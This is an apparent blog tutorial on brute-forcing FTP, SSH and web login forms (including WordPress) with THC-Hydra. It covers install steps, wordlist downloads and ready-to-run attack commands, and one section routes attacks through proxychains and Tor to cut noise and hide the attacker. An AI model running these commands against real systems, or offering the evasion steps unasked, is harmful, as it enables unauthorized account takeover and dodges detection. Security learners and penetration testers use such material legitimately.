Using Hydra To Brute Force Different Services!

Firstly you might think what the hack is THC so My friend it stands for The Hacker’s choice. And it is really a GEM.

This is my first write-up so please forgive my mistakes.

THC-Hydra is a Brute-force Cracking tool which supports many a protocols like HTTP, HTTPS, SSH, Telnet, LDAP, FTP And many more.

Disclaimer AND Credits To the Developer-

Hydra v9.1 © 2020 by van Hauser/THC & David Maciejak — Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). And cracking Instagram!!, As well as Facebook!! Accounts.

Photo by Austin Pacheco on Unsplash

Downloading Hydra In Kali Linux-

You can always find the newest release/production version of hydra at its project page at

https://github.com/vanhauser-thc/thc-hydra/releases

Or GIT Clone it to your Attacker Machine.

HOW TO COMPILE

To configure, compile and install hydra, just type:

./configure
make
make install

and all the supplementary libraries:

apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev \
         libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev \
         firebird-dev libmemcached-dev libgpg-error-dev \
         libgcrypt11-dev libgcrypt20-dev

Check the usage of Hydra by using of below command:

#hydra -h

Hydra works best if you use it with dictionary like Seclists or make you own with Crunch.

Installing SecLists

Zip

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
  && unzip SecList.zip \
  && rm -f SecList.zip

Git (Small)

git clone --depth 1 https://github.com/danielmiessler/SecLists.git

Git (Complete)

git clone https://github.com/danielmiessler/SecLists.git

Kali Linux

apt -y install seclists

Some Examples Because they help to much

1) Brute_F0rcing FTP service

#hydra -L <username_file> -P <password_file> ftp://<Target_IP>
#hydra -l <username> -p <password> ftp://<Target_IP>
#hydra -V -L/root/user.lst -P /root/pass.lst -t 18 10.10.10.10 ftp

• t TASKS: Run task number to connect in parallel (default is 16)
• -V: Verbose

Note that everything hydra does is IPv4 only! If you want to attack IPv6 addresses, you must add the “-6” command line option. All attacks are then IPv6 only!

If you want to supply your targets via a text file, you can not use the :// notation.

foo.bar.com
target.com:21
unusual.port.com:2121
default.used.here.com
127.0.0.1
127.0.0.1:2121

Note that if you want to attach IPv6 targets, you must supply the -6 option and must put IPv6 addresses in brackets in the file(!) like this:

foo.bar.com
target.com:21
[fe80::1%eth0]
[2001::1]
[2002::2]:8080
[2a01:24a:133:0:00:123:ff:1a]

2) Brute_F0rcing SSH Service

#hydra -L users.txt -P /usr/share/wordlist/rockyou.txt 10.10.10.1 ssh

3)Resuming the brute f0rce attack

#hydra -L users.txt -P /usr/share/wordlist/rockyou.txt 10.1.1.1 ssh
#hydra -R

4)Saving 0utput In a File

#hydra -l admin -P pass.txt 10.10.10.10 ssh -o result.txt

5)A layer of an0nymity

A drawback in every other tool is that they generate to much noise. A better option would be to use it with proxy chains and tor.

apt-get install proxychains
apt-get install tor
service tor status //for tor status after installation

Editing Proxy chains:

nano /etc/proxychains.conf

Editing Proxy chains.

Lets start the attack using tor:

proxychains hydra -l admin -p rockyou.txt 10.10.1.1 ssh 

6)Specific p0rt Instead 0f default P0rt

#hydra -l admin -P /usr/share/wordlist/rockyou.txt 1.1.1.1 ftp
    -s 2525

7)Brute forcing L0gin Forms

Firstly We need to find a login form and what type of request the form is making to the web server. Mainly a GET and a POST request is used.

We can check what type of request a form is making by looking in the page Source or by identifying the request in the Burp Proxy.

Secondly we need to specify variables of GET/POST request. With the varying Usernames and Passwords in the “^USER^” and “^PASS^”.

The Third is the string that checks for valid or invalid login any exception to this is counted as a success. The arguments are separated by ‘:’.

Use burp proxy for getting the variables because it is neat and clean in burp and easy peasy as well.

hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

Conclusion:

Hydra is a great tool Which can be use to crack different services by Brute Forcing in a easy way with great impact. But use it for legal purpose only With great tool comes great responsibility as well.

Photo by Daniel Cheung on Unsplash

Thanks For Reading

Author- Harsh Dushyant Singh